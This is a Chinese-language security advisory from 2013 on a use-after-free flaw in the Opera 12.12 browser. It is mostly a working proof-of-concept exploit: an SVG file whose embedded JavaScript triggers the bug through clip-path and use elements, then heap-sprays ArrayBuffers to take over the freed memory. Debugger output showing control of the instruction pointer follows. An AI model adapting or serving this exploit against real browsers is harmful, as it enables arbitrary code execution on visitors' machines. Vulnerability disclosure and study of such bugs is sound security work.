Opera Web Browser释放后重用内存破坏漏洞

Opera Web Browser释放后重用内存破坏漏洞

发布日期：2013-02-05
更新日期：2013-02-28

受影响系统：
Opera Software Opera Web Browser
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57756

Opera为来自挪威的一个浏览器，具有速度快、节省系统资源、订制能力强、安全性高以及体积小等特点，目前已经是最受欢迎的浏览器之一。

Opera Web Browser 12.12及其他版本在实现上存在远程内存破坏漏洞，攻击者可利用此漏洞在受影响应用中执行任意代码。

<*来源：Cons0ul
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<svg xmlns="http://www.w3.org/2000/svg"  xmlns:xlink="http://www.w0.org/1999/xlink">
<g id="group">
<defs>
    <clipPath id="clip-circle" clip-path="url(#clip-rect)">
    </clipPath>
    <clipPath id="clip-rect">
    </clipPath>
</defs>
<circle id="rect" x="10" y="10" width="100" height="100" fill="green" />
</g>
<script><![CDATA[

//Author=Cons0ul

var b = new Array();

// this is our spray function where spray is allocated on LFH with exact size 0x78
// so 0x78 size of block is created so far we are creating 0x50000 blocks
// to create 0x78 blocks we are using ArrayBuffer();

function feng_shui(){

for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection

    for(i=0;i<0x50000;i++){
        payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine
        payload[0]=0x6c
        payload[1]=0x03
        payload[2]=0xfe
        payload[3]=0x7f
        b.push(payload)
    }
}

// bug is use after free in handling of (use tag + clippath) witch try to access freed object
//

        document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)");
        var c = document.createElement('use');
        c.setAttribute("xlink:href","rect")
               
        feng_shui();
        document.getElementById('clip-rect').appendChild(c);
        document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug
        window.opera.collect() // <------ gc() frees the allocation
        feng_shui();    //  <------------ we allocate our code at freed memory
        // at the end it tries freed block witch contains our data
        window.location.href=window.location.href;

/* 

idc !heap -p -a ecx

  address 077c45e0 found in
    _HEAP @ b40000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        077c45d8 0010 0000  [00]  077c45e0    00078 - (free)

PS C:\Users\cons0ul> idc db ecx
077c45e0  92 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00  .H..............
077c45f0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4600  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4610  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4620  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4630  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4640  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
077c4650  00 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88  ..........j[....
PS C:\Users\cons0ul> idc r
eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048
eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0        nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00010202
Opera_6b430000!OpGetNextUninstallFile+0xf8583:
6b8c998b ff5008          call    dword ptr [eax+8]    ds:0023:7ffe489a=????????
*/

        ]]></script>
</svg>

建议：
--------------------------------------------------------------------------------
厂商补丁：

Opera Software
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.opera.com/download/